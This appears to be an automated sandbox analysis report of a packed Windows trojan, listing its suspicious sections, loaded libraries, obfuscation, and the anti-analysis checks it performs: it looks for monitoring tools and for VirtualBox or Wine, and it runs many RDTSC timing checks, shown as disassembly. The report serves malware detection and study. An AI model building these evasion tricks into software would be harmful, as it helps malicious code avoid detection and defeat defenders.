                Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00AC4610 appears 316 times
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exe | Static PE information: Section: lvyqwrnu ZLIB complexity 0.994952444617844
                Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00AD9790
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00AD3970
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ZU9X5LDR.htm
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe | ReversingLabs: Detection: 42%
                Source: file.exe | Virustotal: Detection: 39%
                Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                Source: file.exe | Static file information: File size 2120192 > 1048576
                Source: file.exe | Static PE information: Raw size of lvyqwrnu is bigger than: 0x100000 < 0x19a800
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2118707985.000000000501B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2118707985.000000000501B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.ac0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;lvyqwrnu:EW;fslmoltp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lvyqwrnu:EW;fslmoltp:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00AD9BB0
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe | Static PE information: real checksum: 0x206242 should be: 0x207dcb
                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: lvyqwrnu
                Source: file.exe | Static PE information: section name: fslmoltp
                Source: file.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F9A0FD push 430B1D4Dh; mov dword ptr [esp], eax | 0_2_00F9A13C
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F930D2 push ebx; mov dword ptr [esp], 77EF66AAh | 0_2_00F93101
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F930D2 push eax; mov dword ptr [esp], ecx | 0_2_00F93133
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEA0DC push eax; retf | 0_2_00AEA0F1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1A088 push edi; mov dword ptr [esp], ecx | 0_2_00F1A092
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DF1B1 push edi; mov dword ptr [esp], 7DDB2EBAh | 0_2_011DF1B2
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DF1B1 push edi; mov dword ptr [esp], esp | 0_2_011DF1D2
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DF1B1 push ecx; mov dword ptr [esp], 3EE3BC00h | 0_2_011DF1EB
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DF1B1 push ebp; mov dword ptr [esp], 7D546CE6h | 0_2_011DF1F9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DF1B1 push 25FFF974h; mov dword ptr [esp], ebx | 0_2_011DF29C
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB903E push eax; mov dword ptr [esp], 7E7FE57Bh | 0_2_00DB90D8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB903E push eax; mov dword ptr [esp], ebx | 0_2_00DB91D9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB903E push 3DC986D7h; mov dword ptr [esp], ebp | 0_2_00DB920F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB903E push 5D47B637h; mov dword ptr [esp], ebx | 0_2_00DB9238
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB903E push 10A4E901h; mov dword ptr [esp], ecx | 0_2_00DB9247
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB903E push 76DC3F79h; mov dword ptr [esp], ebx | 0_2_00DB924F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD3011 push 7F94E394h; mov dword ptr [esp], edx | 0_2_00FD30CB
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E41015 push 7F8AE59Bh; mov dword ptr [esp], edx | 0_2_00E4107E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E41015 push ecx; mov dword ptr [esp], 2F34C706h | 0_2_00E410D4
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FCC1F2 push edx; mov dword ptr [esp], eax | 0_2_00FCC1C2
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F931E5 push 29963156h; mov dword ptr [esp], ecx | 0_2_00F93238
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F931E5 push eax; mov dword ptr [esp], edx | 0_2_00F93260
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F931E5 push 4AD1E000h; mov dword ptr [esp], edi | 0_2_00F932D6
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F931E5 push eax; mov dword ptr [esp], esp | 0_2_00F932DA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F9A1C0 push 518B78C9h; mov dword ptr [esp], ecx | 0_2_00F9A1CE
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB71BC push ecx; mov dword ptr [esp], eax | 0_2_00FB71D3
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DF045 push esi; mov dword ptr [esp], ebp | 0_2_011DF059
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DF045 push 2FD8319Fh; mov dword ptr [esp], esi | 0_2_011DF07E
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DF045 push ecx; mov dword ptr [esp], 7FF37348h | 0_2_011DF0F2
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DF045 push ebx; mov dword ptr [esp], 35DEF368h | 0_2_011DF105
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DF045 push 1F76B84Eh; mov dword ptr [esp], esi | 0_2_011DF149
                Source: file.exe | Static PE information: section name: lvyqwrnu entropy: 7.954065080128192

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00AD9BB0

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-37770
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F19FAC second address: F19FB1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F1A105 second address: F1A139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B9C879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jng 00007FC2C8B9C866h 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 js 00007FC2C8B9C878h 0x00000018 jl 00007FC2C8B9C872h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F1DE81 second address: F1DE87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F1DE87 second address: F1DF57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B9C877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dl, 35h 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D3256h], eax 0x00000016 push D81A347Ch 0x0000001b jmp 00007FC2C8B9C871h 0x00000020 add dword ptr [esp], 27E5CC04h 0x00000027 sbb si, 55EFh 0x0000002c push 00000003h 0x0000002e mov dword ptr [ebp+122D3445h], esi 0x00000034 push 00000000h 0x00000036 mov dh, FEh 0x00000038 push 00000003h 0x0000003a pushad 0x0000003b js 00007FC2C8B9C87Ch 0x00000041 mov si, bx 0x00000044 popad 0x00000045 call 00007FC2C8B9C869h 0x0000004a jnl 00007FC2C8B9C878h 0x00000050 jmp 00007FC2C8B9C872h 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 pushad 0x00000059 popad 0x0000005a pop ecx 0x0000005b pop edx 0x0000005c mov eax, dword ptr [esp+04h] 0x00000060 jmp 00007FC2C8B9C875h 0x00000065 mov eax, dword ptr [eax] 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FC2C8B9C871h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F1DF57 second address: F1DFA0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC2C8C1C416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jc 00007FC2C8C1C416h 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 jmp 00007FC2C8C1C41Fh 0x0000001e pop eax 0x0000001f mov dword ptr [ebp+122D35EDh], ecx 0x00000025 lea ebx, dword ptr [ebp+12443D4Dh] 0x0000002b xor si, 0DC7h 0x00000030 and ecx, 42E3D52Fh 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push edx 0x0000003b pop edx 0x0000003c pushad 0x0000003d popad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E024 second address: F1E078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B9C870h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FC2C8B9C868h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D3468h], ebx 0x00000037 push 00000000h 0x00000039 mov dx, 241Ch 0x0000003d push EF1D380Ah 0x00000042 push ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 push edi 0x00000046 pop edi 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E078 second address: F1E07C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E1FF second address: F1E218 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC2C8B9C868h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FC2C8B9C866h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E218 second address: F1E2B8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC2C8C1C416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FC2C8C1C425h 0x00000012 popad 0x00000013 popad 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007FC2C8C1C428h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 pushad 0x00000027 push edi 0x00000028 pop edi 0x00000029 jmp 00007FC2C8C1C41Eh 0x0000002e popad 0x0000002f popad 0x00000030 pop eax 0x00000031 cld 0x00000032 push 00000003h 0x00000034 add dword ptr [ebp+122D3309h], edi 0x0000003a or edx, 31D78206h 0x00000040 push 00000000h 0x00000042 jnp 00007FC2C8C1C41Ch 0x00000048 mov edx, dword ptr [ebp+122D377Ah] 0x0000004e jng 00007FC2C8C1C41Ch 0x00000054 add ecx, dword ptr [ebp+122D1D8Eh] 0x0000005a push 00000003h 0x0000005c adc si, 4FC7h 0x00000061 push 904A0A4Ah 0x00000066 push eax 0x00000067 push edx 0x00000068 jno 00007FC2C8C1C41Ch 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E2B8 second address: F1E2BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E2BD second address: F1E332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 504A0A4Ah 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FC2C9384958h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+12443D61h] 0x00000030 mov dh, A5h 0x00000032 movsx ecx, di 0x00000035 xchg eax, ebx 0x00000036 push ecx 0x00000037 pushad 0x00000038 jmp 00007FC2C9384964h 0x0000003d push eax 0x0000003e pop eax 0x0000003f popad 0x00000040 pop ecx 0x00000041 push eax 0x00000042 pushad 0x00000043 jmp 00007FC2C9384966h 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E332 second address: F1E336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2F0E4 second address: F2F0E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2F0E9 second address: F2F0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F195 second address: F3F19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F104F0 second address: F104FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FC2C8B95C76h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D12B second address: F3D130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D130 second address: F3D137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D55B second address: F3D55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D55F second address: F3D565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D565 second address: F3D56A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D86D second address: F3D874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D874 second address: F3D896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2C9384961h 0x00000009 jmp 00007FC2C938495Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D896 second address: F3D8A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DF55 second address: F3DFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C938495Ah 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC2C9384962h 0x00000012 jnl 00007FC2C9384956h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b push edx 0x0000001c jp 00007FC2C9384956h 0x00000022 jmp 00007FC2C9384966h 0x00000027 pop edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E238 second address: F3E23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E23C second address: F3E249 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC2C9384956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E249 second address: F3E252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F000 second address: F3F004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F004 second address: F3F015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jno 00007FC2C8B95C76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F015 second address: F3F029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FC2C938495Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F029 second address: F3F048 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC2C8B95C76h 0x00000008 jl 00007FC2C8B95C76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC2C8B95C7Bh 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F048 second address: F3F04C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F062A7 second address: F062F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B95C89h 0x00000007 pushad 0x00000008 jmp 00007FC2C8B95C89h 0x0000000d jmp 00007FC2C8B95C86h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F449FD second address: F44A39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C938495Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b jmp 00007FC2C9384966h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC2C938495Bh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F44A39 second address: F44A62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC2C8B95C81h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jc 00007FC2C8B95C7Ch 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F44A62 second address: F44A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F44A68 second address: F44A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC2C8B95C7Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4AC3E second address: F4AC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jo 00007FC2C9384956h 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4AC4B second address: F4AC5B instructions: 0x00000000 rdtsc 0x00000002 je 00007FC2C8B95C7Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4AC5B second address: F4AC5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A1C4 second address: F4A1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 je 00007FC2C8B95C76h 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e pushad 0x0000000f jc 00007FC2C8B95C84h 0x00000015 jmp 00007FC2C8B95C7Eh 0x0000001a pushad 0x0000001b push edi 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A1EC second address: F4A1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A36A second address: F4A39F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC2C8B95C76h 0x00000008 jmp 00007FC2C8B95C7Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007FC2C8B95C78h 0x00000015 pushad 0x00000016 jmp 00007FC2C8B95C80h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A7E0 second address: F4A7E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A7E4 second address: F4A7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A7EA second address: F4A7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FC2C938495Ah 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
